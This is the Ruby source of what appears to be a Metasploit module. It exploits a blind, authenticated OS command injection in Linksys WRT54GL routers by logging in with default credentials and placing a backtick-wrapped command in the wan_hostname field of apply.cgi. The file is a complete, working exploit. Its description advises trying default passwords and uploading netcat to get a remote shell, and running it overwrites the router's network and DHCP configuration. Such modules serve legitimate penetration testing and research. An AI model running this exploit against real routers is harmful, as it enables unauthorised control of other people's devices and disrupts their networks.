##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
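class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Module metadata and the user-facing options.
  #
  # @param info [Hash] base info hash merged by Msf::Auxiliary#initialize
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Linksys WRT54GL Remote Command Execution',
        'Description' => %q{
          Some Linksys Routers are vulnerable to OS Command injection.
          You will need credentials to the web interface to access the vulnerable part
          of the application.
          Default credentials are always a good starting point. admin/admin or admin
          and blank password could be a first try.
          Note: This is a blind OS command injection vulnerability. This means that
          you will not see any output of your command. Try a ping command to your
          local system and observe the packets with tcpdump (or equivalent) for a first test.

          Hint: To get a remote shell you could upload a netcat binary and exec it.
          WARNING: this module will overwrite network and DHCP configuration.
        },
        'Author' => [ 'Michael Messner <devnull[at]s3cur1ty.de>' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-01' ],
          [ 'URL', 'http://www.s3cur1ty.de/attacking-linksys-wrt54gl' ],
          [ 'EDB', '24202' ],
          [ 'BID', '57459' ],
          [ 'OSVDB', '89421' ]
        ],
        'DisclosureDate' => '2013-01-18',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          # CONFIG_CHANGES: the 'Apply' form below rewrites LAN/DHCP settings.
          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('TARGETURI', [ true, 'PATH to OS Command Injection', '/apply.cgi']),
        OptString.new('HttpUsername', [ true, 'User to login with', 'admin']),
        OptString.new('HttpPassword', [ false, 'Password to login with', 'password']),
        OptString.new('CMD', [ true, 'The command to execute', 'ping 127.0.0.1']),
        OptString.new('NETMASK', [ false, 'LAN Netmask of the router', '255.255.255.0']),
        OptAddress.new('LANIP', [ false, 'LAN IP address of the router (default is RHOST)']),
        OptString.new('ROUTER_NAME', [ false, 'Name of the router', 'cisco']),
        OptString.new('WAN_DOMAIN', [ false, 'WAN Domain Name', 'test']),
        OptString.new('WAN_MTU', [ false, 'WAN MTU', '1500'])
      ]
    )
  end

  # LAN address that the submitted form writes back into the router's
  # configuration: LANIP when the user set it, otherwise RHOST.
  # NB: This presumes a dotted quad ip address; nothing here validates it.
  #
  # @return [String]
  def lan_ip
    return datastore['RHOST'] if datastore['LANIP'].to_s.empty?

    datastore['LANIP']
  end

  # Logs in with HTTP basic auth, then submits the configuration form that
  # carries the command. The injection is blind: nothing in the response
  # reveals whether the command ran.
  #
  # @return [Symbol, nil] :abort on any failure path, nil otherwise
  def run
    uri = datastore['TARGETURI']
    user = datastore['HttpUsername']
    rhost = datastore['RHOST']
    # HttpPassword is optional; nil is sent as an empty password.
    pass = datastore['HttpPassword'].to_s

    print_status("Trying to login with #{user} / #{pass}")
    return :abort unless login?(uri, user, pass, rhost)

    cmd = datastore['CMD']
    print_status("Sending remote command: #{cmd}")
    vprint_status("using the following target URL: #{uri}")

    begin
      res = send_request_cgi({
        'uri' => uri,
        'method' => 'POST',
        'authorization' => basic_auth(user, pass),
        'vars_post' => apply_form(cmd)
      })
    rescue ::Rex::ConnectionError
      vprint_error("#{rhost} - Failed to connect to the web server")
      return :abort
    end

    if res && (res.code == 200)
      print_status('Blind Exploitation - Response expected')
    else
      # Fixed wording; the message previously read "Response don't expected".
      print_error('Blind Exploitation - unexpected response')
    end
    print_status('Blind Exploitation - wait around 10 seconds until the configuration gets applied and your command gets executed')
    print_status('Blind Exploitation - unknown Exploitation state')
  end

  private

  # Sends the authenticated GET and reports whether the login was accepted,
  # printing the reason for every failure path.
  #
  # @return [Boolean]
  def login?(uri, user, pass, rhost)
    res = send_request_cgi({
      'uri' => uri,
      'method' => 'GET',
      'authorization' => basic_auth(user, pass)
    })

    unless res.is_a?(Rex::Proto::Http::Response)
      vprint_error("#{rhost} not responding")
      return false
    end

    if res.code == 404
      print_error('Not Found page returned')
      return false
    end

    # NOTE(review): a 301/302 is accepted as a successful login here, although
    # a redirect on its own does not prove the credentials were accepted.
    unless [200, 301, 302].include?(res.code)
      print_error("NO SUCCESSFUL LOGIN POSSIBLE. '#{user}' : '#{pass}'")
      return false
    end

    print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'")
    true
  rescue ::Rex::ConnectionError
    vprint_error("#{rhost} - Failed to connect to the web server")
    false
  end

  # Form fields for the 'Apply' submission. wan_hostname carries the
  # backtick-wrapped command; every other field is either a user option or a
  # fixed value, and the fixed LAN/DHCP values (lan_ipaddr_*, dhcp_start,
  # dhcp_num, ...) are what overwrite the router's existing configuration.
  #
  # @param cmd [String] command placed in wan_hostname
  # @return [Hash{String => String}]
  def apply_form(cmd)
    # Octets for lan_ipaddr_0..3; a value without four dotted parts yields
    # empty fields rather than an error.
    ip = lan_ip.split('.')

    {
      'submit_button' => 'index',
      'change_action' => '1',
      'submit_type' => '1',
      'action' => 'Apply',
      'now_proto' => 'dhcp',
      'daylight_time' => '1',
      'lan_ipaddr' => '4',
      'wait_time' => '0',
      'need_reboot' => '0',
      'ui_language' => 'de',
      'wan_proto' => 'dhcp',
      'router_name' => datastore['ROUTER_NAME'].to_s,
      'wan_hostname' => "`#{cmd}`",
      'wan_domain' => datastore['WAN_DOMAIN'].to_s,
      'mtu_enable' => '1',
      'wan_mtu' => datastore['WAN_MTU'].to_s,
      'lan_ipaddr_0' => ip[0].to_s,
      'lan_ipaddr_1' => ip[1].to_s,
      'lan_ipaddr_2' => ip[2].to_s,
      'lan_ipaddr_3' => ip[3].to_s,
      'lan_netmask' => datastore['NETMASK'].to_s,
      'lan_proto' => 'dhcp',
      'dhcp_check' => '1',
      'dhcp_start' => '100',
      'dhcp_num' => '50',
      'dhcp_lease' => '0',
      'wan_dns' => '4',
      'wan_dns0_0' => '0',
      'wan_dns0_1' => '0',
      'wan_dns0_2' => '0',
      'wan_dns0_3' => '0',
      'wan_dns1_0' => '0',
      'wan_dns1_1' => '0',
      'wan_dns1_2' => '0',
      'wan_dns1_3' => '0',
      'wan_dns2_0' => '0',
      'wan_dns2_1' => '0',
      'wan_dns2_2' => '0',
      'wan_dns2_3' => '0',
      'wan_wins' => '4',
      'wan_wins_0' => '0',
      'wan_wins_1' => '0',
      'wan_wins_2' => '0',
      'wan_wins_3' => '0',
      'time_zone' => '-08+1+1',
      '_daylight_time' => '1'
    }
  end
end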